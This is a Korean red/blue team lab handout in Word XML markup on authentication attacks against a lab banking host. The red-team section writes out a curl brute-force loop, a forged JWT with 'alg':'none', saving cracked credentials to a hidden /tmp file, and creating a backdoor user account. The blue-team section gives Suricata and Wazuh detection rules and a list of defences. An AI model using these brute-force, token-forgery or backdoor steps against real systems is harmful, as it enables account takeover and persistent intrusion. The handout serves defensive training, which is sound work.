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W5] 인증 공격 — 브루트포스/JWT 변조 vs 인증 이상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5주차 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>인증 공격</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. 브루트포스·패스워드 스프레이·해시 크래킹·JWT 변조·세션 공격을 다룬다.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(el34 에는 AD/Kerberos 가 없으므로 Kerberos/NTLM 개념은 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>웹 인증 브루트포스·JWT·SSH 인증</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>으로 치환해</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>실습한다.) Red 는 인증을 공략하고, Blue 는 인증 이상을 탐지한다.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로그인 브루트포스/패스워드 스프레이를 퍼붓고, JWT 의 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>alg:none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 변조를 시도하며, 탈취 크리덴셜로</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>백도어 계정을 만든다. 방어자는 인증 실패 빈도와 토큰 변조를 탐지한다.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인증 공격(자기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공격,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`aa05r1-&lt;본인id&gt;`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, 탈취 크리덴셜 파일 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/tmp/.aa05creds`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aa05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`atka05`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9705011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103051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[브루트포스/JWT] — 로그인 폭주 + 토큰 변조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웹 로그인에 브루트포스/패스워드 스프레이를 반복하고(태그 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>aa05r1-&lt;본인id&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">), JWT 의 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>alg:none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 변조를</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>시도한다. 반복 인증 시도는 대상 audit/로그에 태그와 함께 남는다.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 — 로그인 브루트포스(태그 UA):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>for pw in admin 123456 password admin123 root; do</w:t>
        <w:br/>
        <w:t xml:space="preserve">  curl -s -A "aa05r1-kim-brute" -H "Host: neobank.el34.lab" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    --data "username=admin&amp;password=$pw&amp;Login=Login" "http://192.168.0.161/login"</w:t>
        <w:br/>
        <w:t>done</w:t>
        <w:br/>
        <w:t># JWT alg:none 변조 (개념) — 헤더를 {"alg":"none"} 로 바꾼 토큰으로 요청</w:t>
        <w:br/>
        <w:t>curl -s -A "aa05r1-kim-jwt" -H "Authorization: Bearer eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ." \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -H "Host: neobank.el34.lab" "http://192.168.0.161/api/profile"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aa05r1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 가 포함된 인증 공격 흔적이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aa05r1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 태그가 포함된 인증 공격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[크리덴셜 탈취 발판] — 크랙 결과 + 백도어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해시 크래킹/스프레이로 얻은 크리덴셜을 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/tmp/.aa05creds`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aa05</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)에 저장하고, 지속성을 위해 백도어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`atka05`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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'aa05 cracked: admin:admin123  svc:Summer2026!' &gt; /tmp/.aa05creds</w:t>
        <w:br/>
        <w:t>sudo useradd -m -s /bin/bash atka05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/tmp/.aa05creds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aa05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atka05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/tmp/.aa05creds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aa05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atka05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[인증 공격 탐지] — Suricata 룰 (sid 9705011)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JWT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>alg:none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 변조와 로그인 폭주를 네트워크에서 잡는 Suricata 룰(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sid 9705011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(msg:"ATKADV-W05 JWT alg none tampering"; flow:to_server; content:"eyJhbGciOiJub25lIn0"; nocase; sid:9705011;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r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>eyJhbGciOiJub25lIn0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>{"alg":"none"}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 의 base64url 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9705011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JWT 변조를 보는 sid 9705011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[브루트포스 빈도 탐지] — Wazuh 룰 (id 103051)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인증 공격의 핵심 신호는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>반복 실패</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>다. 동일 IP 의 로그인 폭주를 잡는 Wazuh 룰(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>id 103051</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, frequency)을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name="edu,auth,"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;rule id="103051" level="12" frequency="6" timeframe="120"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;if_matched_group&gt;authentication_failed&lt;/if_matched_group&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;same_source_ip /&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;description&gt;ATKADV-W05 - authentication brute force (repeated failures from same IP)&lt;/description&gt;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r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(인증 실패 그룹이 없으면 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;if_group&gt;web&lt;/if_group&gt;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/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;match&gt;login&lt;/match&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 로 근사.)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103051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브루트포스 빈도를 보는 id 103051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[인증 방어 전략] — Kerberos/NTLM/JWT/OAuth/MFA 종합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인증 공격 전반(Kerberos/NTLM/JWT/OAuth/MFA 우회)에 대한 방어 전략을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공격별 방어: 강한 PW/계정 잠금(브루트포스), 서명 검증·alg 고정(JWT), state·PKCE(OAuth), 피싱 저항 MFA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탈취 크리덴셜(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/tmp/.aa05creds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)·백도어 계정(atka05) 헌팅 결과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인증 방어 전략으로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인증 방어 전략·헌팅은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